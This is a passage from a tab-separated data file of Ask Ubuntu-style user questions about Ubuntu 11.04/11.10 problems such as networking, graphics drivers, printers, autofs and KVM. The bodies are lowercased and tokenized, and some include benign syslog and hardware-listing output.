22:46:44 udevd [ 9332 ] : inotify_add_watch ( 6 , /dev/dm-0 , 10 ) failed : no such file or directory oct 24 22:46:44 kernel : [ 76.931742 ] device-mapper : table : 253:0 : mirror : unknown target type oct 24 22:46:44 kernel : [ 76.931745 ] device-mapper : ioctl : error adding target to table oct 24 22:46:44 disk-detect : error : oct 24 22:46:44 disk-detect : device-mapper target type `` mirror '' is not in the kernel oct 24 22:46:44 disk-detect : oct 24 22:46:44 disk-detect : raid set `` sil_bhbgdgdefacd '' was not activated oct 24 22:46:44 udevd [ 9332 ] : inotify_add_watch ( 6 , /dev/dm-0 , 10 ) failed : no such file or directory thanks
71469	execute script before specific wireless disconnect ?	i have a laptop and nas . what i want to do is to mount my nas only when my wireless is connected , and umount it at wireless disconnected . i have written both scripts i wat to run- they check the name of the connection and connect or disconnect . i have added the connect and disconnect scripts to to /etc/network/if-up.d and /etc/network/if-down.d . the script which starts at if-up works correctly , the other one not- it will simply not umount . i thing the script executes when the wireless is already disconnected . i want a way to run the script pre-disconnecting the wireless . i used to do this with wicd in kubuntu 11.04 , but it seems too buggy now .
71470	start autofs on boot	i have autofs all setup , and it correctly mounts my shared directories . however , right now , i have to manually run sudo upstart autofs start after every boot , before the automounting actually works . i think in installed autofs manually through synaptic , though it has been a while . the computer in question is used as a lightweight server , and rarely gets restarted , so having to manually start a service is n't too big a deal , but my backups do not work until autofs is running , so i do worry .
71480	`` firewalld not running '' error when trying to install a printer	when trying to add my printer in a fresh install of 11.10 i get this error message . what does it mean , and what do i have to do ? it worked fine in 11.04 ( with hplip ) .
71482	nautilus statusbar visibilty - quickly check free space	in prior versions , i would open nautilus and check the statusbar , which would tell me how much free space there is . now , the statusbar is n't shown by default . i know you can enable it from the view menu , but 99 % of users wo n't do that ( and i 'd rather not do that , if possible ) . so , is there some new recommended way to keep tabs on hard drive usage ? or is there maybe some other method that i should have been using in the past but never noticed ?
71487	firefox freezes on various sites , what to do ?	on ubuntu 11.10 , my firefox freezes on sites like blogspot , google , ubuntu support or mozilla ... i do n't know why it happens , but it happens every time and i do n't know if i should reinstall the whole system . can someone please help me ? here is what i did before this happens : downloaded opera browser ( also does n't work , like epiphany or any other ) and then when i was downloading 5 torrents at once it happened , firefox froze , but since there it does freeze every day on various sites .
71489	how do i get an intel alc 880 analog sound card working on an asus a6v ?	i have an asus a6v with ubuntu 11.10 ( 32 bit ) . i do n't find the drivers installed for hda intel alc 880 analog and digital . when i go into system settings and click on sound ( in the hardware category ) , i should be able to select and enable the usb headphones/speakers in te output tab . but i ca n't do that . there is n't any drivers installed . what i should ? bye-bye
71491	how to share with a remote windows user ?	i have ubuntu one enabled and working on my ubuntu 10.10 desktop . my partner , at a remote location , uses windows ( xp & 7 ) . i enabled a specific folder for him to access ( to view , not change the files ) . if he downloads the windows client , what url does he need to access to view/download the files ? thanks
71493	ssh connection reset by peer after 11.10 update . ( proxy issue )	my work computer sits behind a proxy ( i know thats where the problem lies . ) i was running 11.4 and using ssh to establish a socks proxy to my server at home . i can still connect to that server from other computers ( windows +putty ) but when i try to connect to it from my ubuntu box i get a connection reset by peer . also : proxy requires authentication . my proxy settings are working for http . i tried to use dconf as well . thanks for any help !
71494	how do i configure an action when pressing hardware power button ?	there is no option `` action when pressing hardware power-button '' ( shutdown , hibernate , suspend ) in ubuntu 11.10 . where to configure it in the system ? ... i 've found the answer here .
71495	split screen and other issues on ubuntu 11.10 with ati graphics card	ever since updating my ubuntu 11.04 to 11.10 i experience issues with graphics . the biggest is the `` split screen '' effect where my desktop is shifted to the right , resulting in having unity bar in the middle of the screen , as shown here : this changes from boot to boot , sometimes it 's on the left , sometimes in the middle . what i tried : removing fglrx drivers completely installing post-update version of them , but installation is broken atm in the ubuntu , so no go . no one is even trying to fix it ( bug report https : //bugs.launchpad.net/ubuntu/+source/nvidia-common/+bug/873058 and a couple of duplicates out there ) also using the open source `` radeon '' driver results in the same ( i have a better successful boot ratio with this one , proprietary rarely lets me boot ) other artifacts are : serious screen tearing weird lines flickering in random places lagginess did anyone experience that ? my specs : ubuntu 11.10 amd radeon hd 6950 1gb
71496	why does my perl cgi script raise an internal server error on apache ?	i 've installed apache2 on ubuntu 11.04 , and localhost is working . i created a simple printenv.pl script and put it in the following directory $ mv printenv.pl /usr/lib/cgi-bin/ $ chmod +rx /usr/lib/cgi-bin/printenv.pl however when i go to http : //127.0.0.1/cgi-bin/printenv.pl , i get a 500 internal server error i checked the error log at /var/log/apache2 , and this is what it says : [ mon oct 24 11:04:25 2011 ] [ error ] ( 13 ) permission denied : exec of '/usr/lib/cgi-bin/printenv.pl ' failed [ mon oct 24 11:04:25 2011 ] [ error ] [ client 127.0.0.1 ] premature end of script headers : printenv.pl any suggestions on how i can fix this and run cgi scripts on my localhost ?
71500	voice calls not working over gtalk with empathy	with empathy internet messaging in ubuntu11.04 , written messages are working but i ca n't obtain voice call from my gmail account and with people using googtle talk . any help ? thanks
71505	on my desktop my folder and file icons do not display the file names	i upgraded to 11.10 and using unity 2d . my desktop consists of icons of folders and files . prior to the upgrade , all folder and files had file names underneath . the names have all disappeared now and all i see are icons . i would like to bring back the file names . how do i do that ? i tried compizconfig , and a few other options without any success . after trying my solution to the problem for some reason the desktop reverted back to how it was before . i do not know why .
71506	i ca n't shut down nor reboot without console	after update from 11.04 to 11.10 an wired conduct appears in my machine : shutdown gui methods ( including reboot ) cause only a log off , and in the login screen , shutdown nor reboot options do anything ( if you wonder , reboot appears in the shutdown dialog ) . the only way i can reboot or shutdown is trough console sudo shutdown -h now or sudo reboot . this is ok for me , but not for the rest of the users . how to fix this ? update the syslog output when select shutdown from my desktop is : aptdaemon : info : quitting due to inactivity aptdaemon : info : quitting was requested cron [ 5095 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) cron [ 5094 ] : ( root ) mail ( mailed 1 byte of output ; but got status 0x00ff , # 012 ) kernel : [ 17027.614974 ] psmouse.c : touchpad at isa0060/serio4/input0 lost sync at byte 1 kernel : [ 17027.616510 ] psmouse.c : touchpad at isa0060/serio4/input0 lost sync at byte 1 kernel : [ 17027.618037 ] psmouse.c : touchpad at isa0060/serio4/input0 lost sync at byte 1 kernel : [ 17027.619557 ] psmouse.c : touchpad at isa0060/serio4/input0 lost sync at byte 1 kernel : [ 17027.621046 ] psmouse.c : touchpad at isa0060/serio4/input0 lost sync at byte 1 kernel : [ 17027.621051 ] psmouse.c : issuing reconnect request acpid : client 1032 [ 0:0 ] has disconnected acpid : client connected from 1032 [ 0:0 ] acpid : 1 client rule loaded gnome-session [ 1836 ] : warning : unable to stop system : authorization is required acpid : client 1032 [ 0:0 ] has disconnected acpid : client connected from 6055 [ 0:0 ] acpid : 1 client rule loaded rtkit-daemon [ 1313 ] : successfully made thread 6134 of process 6134 ( n/a ) owned by '119 ' high priority at nice level -11. rtkit-daemon [ 1313 ] : supervising 4 threads of 2 processes of 2 users . rtkit-daemon [ 1313 ] : successfully made thread 6139 of process 6134 ( n/a ) owned by '119 ' rt at priority 5. rtkit-daemon [ 1313 ] : supervising 5 threads of 2 processes of 2 users . rtkit-daemon [ 1313 ] : successfully made thread 6140 of process 6134 ( n/a ) owned by '119 ' rt at priority 5. rtkit-daemon [ 1313 ] : supervising 6 threads of 2 processes of 2 users . i suspect that the line gnome-session [ 1836 ] : warning : unable to stop system : authorization is required is related to the issue . when selecting shutdown from the login screen , the output is the same from the line pointed . this is the output : gnome-session [ 1836 ] : warning : unable to stop system : authorization is required acpid : client 1032 [ 0:0 ] has disconnected acpid : client connected from 6055 [ 0:0 ] acpid : 1 client rule loaded rtkit-daemon [ 1313 ] : successfully made thread 6134 of process 6134 ( n/a ) owned by '119 ' high priority at nice level -11. rtkit-daemon [ 1313 ] : supervising 4 threads of 2 processes of 2 users . rtkit-daemon [ 1313 ] : successfully made thread 6139 of process 6134 ( n/a ) owned by '119 ' rt at priority 5. rtkit-daemon [ 1313 ] : supervising 5 threads of 2 processes of 2 users . rtkit-daemon [ 1313 ] : successfully made thread 6140 of process 6134 ( n/a ) owned by '119 ' rt at priority 5. rtkit-daemon [ 1313 ] : supervising 6 threads of 2 processes of 2 users . acpid : client 6055 [ 0:0 ] has disconnected acpid : client connected from 6055 [ 0:0 ] acpid : 1 client rule loaded
71508	how come 11.10 does n't come with some of the applications from 11.04 ?	i have a fresh install of ubuntu 11.10 ( oneiric ) on a raid stripe . in order to install on a raid i had to use the alternate installation ( ubuntu-11.10-alternate-amd64.iso ) i noticed off-the-bat that some applications that were in 11.04 are no longer in 11.10 like synaptic package manager or startup applications ( it 's there , but shows an empty list ... ) . how come they are no longer there ? i need to avoid downloading anything extra due to my limited internet connection ( satellite ) . i have 500mb/daily @ 100mb ( 6-60kb/s ) . on top of that , it is throttled from 1:00-20:00 ! on top of that ... it took two days to retrieve the iso . the md5 matches the iso i downloaded so i think that tells me that nothing is missing ...
71510	how do i create a ppa ?	how do i create my own custom ppa to share with the ubuntu community ? i am trying to create my own custom package set and i would really like to share it with the community .
71511	what is best practices for upgrading for rails 3 ?	currently running rails 3.07 , ruby 1.92 , rvm and postgresql on ubuntu 11.04 . everything works great . does upgrading ubuntu ( to 11.10 oneiric ocelot ) cause any problems in ruby on rails ? does upgrading ubuntu cause problems in general ? when is the `` best '' time to update ubuntu ? also , is it possible to rollback an ubuntu upgrade ? thanks .
71518	how do i prevent ubuntu one indicator from connecting automatically after login ?	i use ubuntu one together with the indicator for the panel on two differnt laptops ( installed the same way ) . on one laptop ubuntu one connection is started automatically after login where on the other it is n't . how can i get the behaviour of ubuntu one not being connected automatically after login ?
71520	netbook-sized unity launcher for big screen desktops ?	the netbook screenshots people post have much bigger dock and launcher icons ( relatively ) than desktops , like eight icons fill the dock . it 'd be great to use this layout on big screens too , but various options for increasing the size ( ccsm , dconf , ubuntu tweaks ) only help a little . is this simply due to screen resolution ? any way to duplicate the `` huge '' interface for use on a 1080p tv ?
71527	are there any plans to port the old indicators for the new gnome panel ?	in ubuntu 11.04 , i was using the classic desktop and have all ubuntu indicators on the gnome panel . but in ubuntu 11.10 we can only use the classic gnome 3 , so is there any plans to port the ubuntu indicators for the new gnome panel ?
71528	make network manager restart after dropped connection ?	using ubuntu 11.10 ( unity 3d ) and a cable ( dsl ) internet connection with no router or modem . if i disconnect my internet connection , i can just reconnect by clicking on the network manager icon and selecting a connection from the drop down menu since my connections are visible . there is no need to restart network manager . but whenever the internet connection drops by itself , i have open a terminal and use sudo service network-manager restart since i do n't see any connection in the network manager drop down menu . only after the command , does network manager then start and automatically connect . is there some setting so that network manager does not have to be restarted each time the connection drops ( as opposed to my disconnecting it when it does n't need a restart ) ? i guess in other words , i do n't want network manager to stop as long as i 'm using the computer , irrespective of whether my connection to the isp has dropped or not . it 's not a very big deal to open a terminal and type the command and password , but if there 's a way to ensure that network manager does n't stop that would be better . edit dated jan 26 , 2012 : lines from syslog jan 25 20:09:36 aes-inspiron-1545 pppd [ 3539 ] : no response to 3 echo-requests jan 25 20:09:36 aes-inspiron-1545 pppd [ 3539 ] : serial link appears to be disconnected . jan 25 20:09:36 aes-inspiron-1545 pppd [ 3539 ] : connect time 241.5 minutes . jan 25 20:09:36 aes-inspiron-1545 pppd [ 3539 ] : sent 3575961 bytes , received 79026206 bytes . jan 25 20:09:36 aes-inspiron-1545 pppd [ 3539 ] : connection terminated . jan 25 20:09:36 aes-inspiron-1545 avahi-daemon [ 836 ] : withdrawing workstation service for ppp0 . jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < info > ( eth0 ) : device state change : activated - > failed ( reason 'ppp-disconnect ' ) [ 100 120 13 ] jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < warn > activation ( eth0 ) failed . jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < info > ( eth0 ) : now unmanaged jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < info > ( eth0 ) : device state change : failed - > unmanaged ( reason 'removed ' ) [ 120 10 36 ] jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < info > ( eth0 ) : deactivating device ( reason 'removed ' ) [ 36 ] jan 25 20:09:36 aes-inspiron-1545 dbus [ 802 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < warn > could not read ppp stats : no such device jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < info > ( eth0 ) : cleaning up ... jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < info > ( eth0 ) : taking down device . jan 25 20:09:36 aes-inspiron-1545 kernel : [ 18027.155552 ] sky2 0000:09:00.0 : eth0 : disabling interface jan 25 20:09:36 aes-inspiron-1545 avahi-daemon [ 836 ] : interface eth0.ipv6 no longer relevant for mdns . jan 25 20:09:36 aes-inspiron-1545 avahi-daemon [ 836 ] : leaving mdns multicast group on interface eth0.ipv6 with address fec0 : :b:223 : aeff : fe2d:2431 . jan 25 20:09:36 aes-inspiron-1545 avahi-daemon [ 836 ] : withdrawing address record for 2002:1b00:3b4f : b:223 : aeff : fe2d:2431 on eth0 . jan 25 20:09:36 aes-inspiron-1545 avahi-daemon [ 836 ] : withdrawing address record for 2002:1b00:3754 : b:223 : aeff : fe2d:2431 on eth0 . jan 25 20:09:36 aes-inspiron-1545 avahi-daemon [ 836 ] : withdrawing address record for 2002:7345 : f137 : b:223 : aeff : fe2d:2431 on eth0 . jan 25 20:09:36 aes-inspiron-1545 avahi-daemon [ 836 ] : withdrawing address record for fec0 : :b:223 : aeff : fe2d:2431 on eth0 . jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) jan 25 20:09:36 aes-inspiron-1545 networkmanager [ 3531 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) jan 25 20:09:36 aes-inspiron-1545 pppd [ 3539 ] : terminating on signal 15 jan 25 20:09:36 aes-inspiron-1545 pppd [ 3539 ] : exit . jan 25 20:09:36 aes-inspiron-1545 dbus [ 802 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' jan 25 20:11:56 aes-inspiron-1545 modem-manager [ 3529 ] : < info > caught signal 15 , shutting down ... jan 25 20:11:56 aes-inspiron-1545 networkmanager [ 3531 ] : < info > caught signal 15 , shutting down normally . jan 25 20:11:56 aes-inspiron-1545 networkmanager [ 3531 ] : < warn > quit request received , terminating ... jan 25 20:11:56 aes-inspiron-1545 networkmanager [ 3531 ] : < info > ( eth1 ) : now unmanaged jan 25 20:11:56 aes-inspiron-1545 networkmanager [ 3531 ] : < info > ( eth1 ) : device state change : unavailable - > unmanaged ( reason 'removed ' ) [ 20 10 36 ] jan 25 20:11:56 aes-inspiron-1545 networkmanager [ 3531 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) jan 25 20:11:56 aes-inspiron-1545 networkmanager [ 3531 ] : < info > exiting ( success ) jan 25 20:11:56 aes-inspiron-1545 modem-manager [ 6945 ] : < info > modemmanager ( version 0.5 ) starting ... jan 25 20:11:56 aes-inspiron-1545 networkmanager [ 6947 ] : < info > networkmanager ( version 0.9.1.90 ) is starting ... jan 25 20:11:56 aes-inspiron-1545 networkmanager [ 6947 ] : < info > read config file /etc/networkmanager/networkmanager.conf jan 25 20:11:56 aes-inspiron-1545 kernel : [ 18167.470749 ] init : reconnect main process ( 6948 ) terminated with status 2 jan 25 20:11:56 aes-inspiron-1545 modem-manager [ 6945 ] : < info > loaded plugin nokia jan 25 20:11:56 aes-inspiron-1545 modem-manager [ 6945 ] : < info > loaded plugin ericsson mbm jan 25 20:11:56 aes-inspiron-1545 modem-manager [ 6945 ] : < info > loaded plugin motoc
71529	resolution of the login screen is wrong on a second monitor	is it possible to do changes to the login screen in ubuntu 11.10 ? i 'm running with a laptop and an external screen and in boot and login they 're mirrored and has a weird resolution . to clarify : i 'm using my laptop with an external screen , with my laptop to the right and the screen in front of me . i 've set it up as an extended desktop ( is that right ? ) . but it 's not like that on the login screen , there , my screens are mirrored and has a weird resolution , way bigger than it should be . does that make any sense ? when logged in , my external screen is the `` main '' window , where the top bar is and so on . to my left , my laptop has only the desktop wallpaper , there i can place whatever i like . it 's like one big desktop on two screens . so , at login i would like the same . can i fix this ?
71531	how can i enable mouse wheel scroll in 'less ' in lxterminal ?	in lubuntu 11.10 , when i use the 'less ' pager in lxterminal , the mouse scroll wheel has no effect . in gnome-terminal , it scrolls the text up or down when viewing a file with 'less ' . is there anyway to enable this functionality in lxterminal ?
71534	wireless card does n't work for an hp dv2104	hp laptop upgraded from 10.10 to 11.10 , model dv2104 . i used a wired connection for the install , but now it does not even seem to recognise that there is a wireless card . i think i need help with this one . question input on another connected device ! installed wicd & wicd network manager & removed network manager - using software centre . wired connection is ok , but wicd nm says there are no wireless networks available although i am less than 6ft from a ( working ) wireless router . the hardware wireless switch on the hp is at left for on , but the light shows orange ! ( it 's normally blue when connected wirelessly ) stumped ! !
71540	how to boot muted ?	how can we boot muted as sometimes booting and start up sounds will disturb people around in a silent environment ( libraries etc. ) ? i know i can remove the start up sound effects but that 's not i want .
71547	install windows xp in ubuntu 11.04	i have ubuntu 11.04 on my hard disk . now i want to create a ntfs partition for windows xp and install windows xp to get dual operating systems . how should i go about doing this ? how to create the partition in linux ? i am new to linux..can anyone please help me ? thanks
71549	is there a package of rawstudio 2.0 ?	will rawstudio 2.0 come to ubuntu 11.10 ?
71550	network problem with ubuntu 11.10	i have a lot of network problems since i made the upgrade to the 11.10 in our company , we have 3 computers upgraded to the 11.10 . every one of this have network problems . the other computers are under ubutun 11.04 ands works fine . the network problem are not constants , sometimes after a reboot it 's working . but if there are a problem i stay since a reboot . for example we have : connection troubles : streaming music does not work more than 30s , a lot of ajax request does not work . error on requesting a webpage , the browser ( firefox , chromium ) does n't find the hosts error often on requesting a webpage for a /etc/hosts host error on ssh or scp , display the message : no root to host error on svn . we already tried : desactivate ip v6 install wicd instead of `` network manager '' replace the /etc/resolv.conf by static data etc . is somebody have an idea ? thanks a lot ! see you , thomas . [ edit ] add some hard ware informations sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 82p965/g965 memory controller hub [ 8086:29a0 ] ( rev 02 ) 00:01.0 pci bridge [ 0604 ] : intel corporation 82p965/g965 pci express root port [ 8086:29a1 ] ( rev 02 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 82g965 integrated graphics controller [ 8086:29a2 ] ( rev 02 ) 00:02.1 display controller [ 0380 ] : intel corporation 82g965 integrated graphics controller [ 8086:29a3 ] ( rev 02 ) 00:19.0 ethernet controller [ 0200 ] : intel corporation 82562v 10/100 network connection [ 8086:104c ] ( rev 02 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 [ 8086:2834 ] ( rev 02 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 [ 8086:2835 ] ( rev 02 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 [ 8086:283a ] ( rev 02 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801h ( ich8 family ) hd audio controller [ 8086:284b ] ( rev 02 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 1 [ 8086:283f ] ( rev 02 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 [ 8086:2830 ] ( rev 02 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 [ 8086:2831 ] ( rev 02 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 [ 8086:2832 ] ( rev 02 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 [ 8086:2836 ] ( rev 02 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev f2 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801hh ( ich8dh ) lpc interface controller [ 8086:2812 ] ( rev 02 ) 00:1f.2 raid bus controller [ 0104 ] : intel corporation 82801 sata raid controller [ 8086:2822 ] ( rev 02 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801h ( ich8 family ) smbus controller [ 8086:283e ] ( rev 02 ) -- sudo lshw -class network *-network description : ethernet interface product : 82562v 10/100 network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 02 serial : 00:19 : d1:47 : e4 : da size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.3.10-k2 duplex=full firmware=1.1-2 ip=192.168.2.166 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 memory : dfde0000-dfdfffff memory : dfddb000-dfddbfff ioport : ecc0 ( size=32 )
71554	putty x11 forwarding broken in 11.10	when i connected to my 11.04 server using putty ( from windows ) with x11 forwarding enabled , if i entered the command echo $ display i 'd see localhost:10.0 and when i started an x program , it would appear on my windows 's x server . after upgrading to 11.10 , the display variable is no longer being set when i log in , so x forwarding does n't work . i have checked to ensure that x11 forwarding is still enabled in the ssh server config ( it is ) and the config files have n't actually changed since before the upgrade . so why did the upgrade stop this feature from working ? oh , i can manually set display to point to my windows machine and x works fine , but it is n't being tunneled through the ssh connection like i 'd prefer . help ?
71557	how to get faster graphics in kvm ? vnc is painfully slow with haiku os guest , spice wo n't install and sdl does n't work	i 've been coming up to speed on the haiku operating system , an open source clone of beos 5 pro . i 'm using an apple macbook pro as my development machine . apple 's bootcamp bios does not support more than four partitions on the internal hard drive . while i can set up extended and logical partitions , doing so will prevent any of the installed operating systems from booting . to run haiku directly on the iron , i boot it off a usb stick . using external storage is also helpful because i am perpetually out of filesystem space . while virtualbox is documented to allow access to physical drives , i could not actually get it to work . also virtualbox can only use one of the host cpu 's cores . while vb guests can be configured for more than one cpu , they are only emulated . a full build of the haiku os takes 4.5 under vb . i had the hope of reducing build times by using kvm instead , but it 's not working nearly as well as virtualbox did . the linux kernel virtual machine is broken in all manner of fundamental ways as seen from haiku . but i 'm a coder ; maybe i could contribute to fixing some of those problems . the first problem i 've got is that haiku 's video in virt-manager is quite painfully slow . when i drag haiku windows around the desktop , they lag quite far behind where my mouse is . it 's quite difficult to move a window to a precise position on the screen . just imagine that the mouse was connected to the window title bar with a really stretchy spring . also haiku 's mouse lags quite far behind where i have moved it . i found lots of personal package archives that enable spice from qemu / kvm at the ubuntu personal package arhives . i tried a few of the ppas but none of them worked ; with one of them , the command `` add-apt-repository '' crashed with a traceback . there is a wiki page about spice , but it says that it only works on 64-bit . my early 2006 macbook pro is 32-bit . its apple model identifier is macbookpro1,1 ; these use core duos not core 2 duos . i do n't mind building a source deb for 32-bit if i can expect it to work . is there some reason that spice should be 64-bit only ? does it need features of the x86_64 instruction set architecture that x86 does not have ? when i try using sdl from virt-manager , the configuration for local sdl window says `` xauth : /home/mike/.xauthority '' . when i try to start my guest , virt-manager emits an error . when i googled the error message , the usual solution was to make ~/.xauthority readible . however , .xauthorty does not exist in my home directory . instead i have a $ xauthority environment variable . there is no way to configure sdl in virt-manager to use $ xauthority instead of ~/.xauthority . neither does it work to copy the value of $ xauthority into the file . i am ready to scream , because i 've been five fscking days trying to make kvm work for haiku development . there is a whole lot more that is broken than the slow video . all i really want to do for now is speed up my full builds of haiku by using `` jam -j2 '' to use both cores in my cpu . i may try xen next , but the last time i monkeyed with xen it was far , far more broken than i am finding kvm to be . just for now , i would be satisfied if there were some way to use my usb stick as a drive in virtualbox . vb does allow me to configure /dev/sdb as a drive , but it always causes a fatal error when i try to launch the guest . thank you for any advice you can give me . -
71560	correct settings for nvidia current driver to make work dual monitor setup as extended desktop ( not twinview )	i have an asus 22 '' widescreen monitor with resolution : 1680x1050 , and another samsung 19 '' with resolution : 1280*1024 . i use my asus as primary display , and want to use my samsung monitor as streched desktop , but when i activate the secondary display , it works only in twinview mode ( it works correct ) . but when i try to use it in separate x mode , in different resolution , all the things ( unity launcher , gnome panel ( top bar ) , and window borders ) missing . if i restart the system ( only reset works ) the login screen appears , but ca n't login , because the loginscreen freezes after typing password and hitting enter . i can login with ubuntu 2d . without closed nvidia drivers the extended desktop mode works correct ( under display menu ) . is there any way to make it work ? what did i wrong ? i 'm using nvidia 9600gt in my system , with ubuntu 11.10 . thanks in advance .
71564	mke2fs writes 2.4 gib to disk	using the ubuntu 11.10 64-bit desktop livecd , i created a 149.04 gib partition using gdisk on an unpartitioned ssd . i opened gparted to notice that nothing has been written to the new partition . then i used mke2fs like this : sudo mke2fs -t ext4 -o ^has_journal /dev/sda1 right after , i opened gparted to notice 2.40 gib has been written to this partition . what has just been written ? i thought -o ^has_journal makes sure a journal is n't created . so what was actually written to the partition ?
71566	what is the `` yes '' command ?	i issued a command in the ubuntu terminal that required me to type yes but i discovered that it only asks me the first time , but i had already pressed enter before i realized . so i expected a `` command not found '' message but instead i got a never-ending stream of `` y '' s. this seems to be the only thing this does , so i 'm wondering what the point of this command is and why it outputs `` y '' s ? ( ubuntu 11.10 )
71568	usb printer works only with one notebook	i have an hp laserjet p1005 . printer is connected by usb and configured with hplib driver . i have to notebooks running ubuntu . notebook a ubuntu 10.10 after connecting printer is doing some initialization work printing works without problems notebook b ubuntu 11.10 after connecting printer is quite , no initialization no errors in syslog print jobs are send to the printer but printer does not execute the jobs , no error popups or error messages in syslog after connecting the printer to notebook a and and back to notebook b printing works fine an notebook b can you help me ?
71569	extremely long boot time	i installed 11.10 via wubi on my toshiba nb-205 netbook ( intel atom n280 / 1.66 ghz , 1gb ram , mobile intel 945gse express ) . after the initial boot and login , which went fine , i was checking out the desktop when the cursor froze . i could navigate with the keyboard but it appeared that the touchpad was not working . i restarted the netbook and after grub was chain-loaded and ubuntu was selected , booting appeared to hang on a blank purple screen . after about five minutes lightdm appeared and i could login normally ; also the touchpad was working normally . i checked to see if there was a driver that needed to be installed in case the touchpad was causing boot issues but no proprietary drivers are found via additional drivers . after reading similar problems , with no working solutions , it seemed it was a good idea to see if dmesg held any clues . admittedly , i am not sure what to look for . i did notice the following lines : [ 0.263568 ] pci0000:00 : acpi _osc failed ( ae_not_found ) , returned control mask : 0x1d [ 0.263575 ] acpi _osc control for pcie not granted , disabling aspm i do not know if that is normal . additionally , this popped up a few times : ext4-fs ( loop0 ) : re-mounted . opts : errors=remount.ro basically , i just searched for `` fail '' and `` error '' in a text editor and those are what were found . does anyone have any clue what may be causing the long boot time ? thank you for your time .
71578	thunderbird firetray add-on - must close twice	i 've installed thunderbird and firetray addon , then checked to minimize to tray on close . now , if i start thunderbird after quitting ( win+q ) and try to close with alt+f4 : for the first time it 's minimised properly to tray on each next time i need to double press `` close button '' , and if the window is not maximised firstly it maximizes ( first alt+f4 ) , then closes ( second alt+f4 ) could you help me , please ? ubuntu 11.10 , unity 2d
71581	does changing the resolution in display setting work correctly with nvidia server settings	i want to know since in 11.04 it did not work , if after upgrading to 11.10 will the resolutions in display settings when change will actually change the resolution . i ask this since when using my nvidia car i could only change the resolution from the nvidia x server settings and not the display settings . would be nice to know that i can change them from the display settings also .
71585	what are the equivalents of `` gksu nautilus '' in other ubuntu derivatives	how do i open the file manager in superuser mode in the same way as doing gksu nautilus in ubuntu .
71592	where are the proxy profile options ?	before 11.10 , one could save many proxy configurations as profiles , so one could have a config for home and another for work in a laptop . now that i 've updated to 11.10 , i no longer have that option . so , how can i configure a proxy profile for my home and one for my job ? by the way , the proxy configuration has been merged into the network configuration .
71594	can not set file permissions	i am trying to set file permissions for a folder named sales . i am doing a school project and i want to give a tutorial regarding file permissions . i am using vmware workstation and when i go on sales permissions and try to set a file permission , it will return to - . also , i can not tick to execute the file as a program : s ... when i try to do so the tick will also automatically vanish . this is rather strange but do n't know what is going on .
71604	how can i use apt-get install without interrupting ? while assigning with large package lists	i have a line `` apt-get install package1 ... package60 '' , now once any one of the package is missing i want that it simply ignore that package and still continue . how to do that ? in ubuntu 11.04 .
71610	fixed window placement does n't work for quod libet	i use fixed window placement ( in `` compizconfig settings manager '' under `` place windows '' , second tab ) to make sure certain applications always open in a certain viewport ( workspace ) . in ubuntu 11.10 , this does n't work anymore for quod libet , it just opens in the viewport i 'm in and not in the one i want it to open in . it did work properly in 11.04 . i tried to delete the entry for quod libet in the placement list and add it again , grabbing the window to make sure the class is right , but that does n't help . and the problem only seems to appear for quod libet , other applications open in the viewport i set them to . any ideas how to solve this ?
71613	how to stop maximizing windows in unity 2d ?	switch to another virtual desktop after unmaximizing a windows ( firefox , dconf-editor ) , and then return to the previous virtual desktop . firefox becomes maximized again . how do i stop it ? ? ? i 've tried setting desktop > unity > 'form factor ' to desktop as suggested in prevent unity from auto-maximizing i 've also tried stuff from how to keep programs from launching maximized ? , in particular : gconftool -s /apps/metacity/general/auto_maximize_windows -t bool false none of that works . please read the question before marking it as a duplicate . please do n't suggest ccsm , this is unity2d .
